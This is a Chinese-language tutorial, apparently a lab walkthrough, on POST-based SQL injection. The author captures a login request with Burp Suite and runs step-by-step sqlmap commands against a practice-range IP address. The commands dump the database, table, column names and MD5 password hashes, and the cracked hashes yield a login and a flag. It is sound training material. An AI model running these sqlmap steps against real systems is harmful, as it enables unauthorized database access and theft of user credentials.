通八洲科技

POST型SQL注入教学

日期:2025-09-20 00:00 / 作者:蓮花仙者

本次教程将使用burpsuite、sqlmap和浏览器进行教学。我们将展示如何使用这些工具来进行post型sql注入。

首先,我推荐大家使用AJE-Windows工具包,它包含了所有我们需要的工具,这样就不需要一个个下载,非常方便。

接下来,我将介绍SQLMAP中一些常用的模块参数:

让我们开始吧,首先打开AJE-Windows,然后启动SQLMAP和burpsuite。

靶场地址是http://219.153.49.228:45888。

我们随便输入一个账号和密码,然后在burpsuite中开启拦截功能,点击登录按钮。将拦截到的数据包通过右键发送到repeater。

右键选择将文件复制到桌面。

输入文件名并点击保存。

然后输入命令

sqlmap.py -r
加上刚才保存的数据包路径(可以直接拖拽文件到命令行)
--current-db
,然后按回车。

运行结果显示,这个站点常用的数据库名是

mozhe_Discuz_StormGroup

接下来,我们要获取数据库表名,输入命令

sqlmap.py -r
抓包的文件
-D
该站点用的数据库名
--tables

结果显示表名是

StormGroup_member

然后我们获取表内的字段,输入命令

sqlmap.py -r
数据包文件
-D
数据库
-T
表名
--columns

结果显示表内的字段有

name
password
,分别是用户名和密码的列名。

接下来我们获取用户名和密码,输入命令

sqlmap.py -r
数据包文件
-D
库名
-T
表名
-C
name,password
--dump

第一个用户名是

mozhe
,第二个也是,第一个密码是
356f589a7df439f6f744ff19bb8092c0
,第二个密码是
cac346c4e78571439ba96bc5a47c01b6
,它们使用的是MD5加密,第一个密码解密后是
dsan13

我们尝试使用第一个用户名和密码登陆,结果失败了。

然后尝试第二个用户名和密码,第二个密码解密后是

885288

我们使用第二个用户名和密码尝试登陆,结果成功了,获取到的key是

mozhe4953564e012412470c2374e45919c2

提交key。

好的,本次教学就到这里。如果你喜欢我的文章,欢迎点赞、关注,并订阅我的专栏,或者加入我的专栏。如果有任何不足之处,欢迎通过QQ3516634930反馈给我。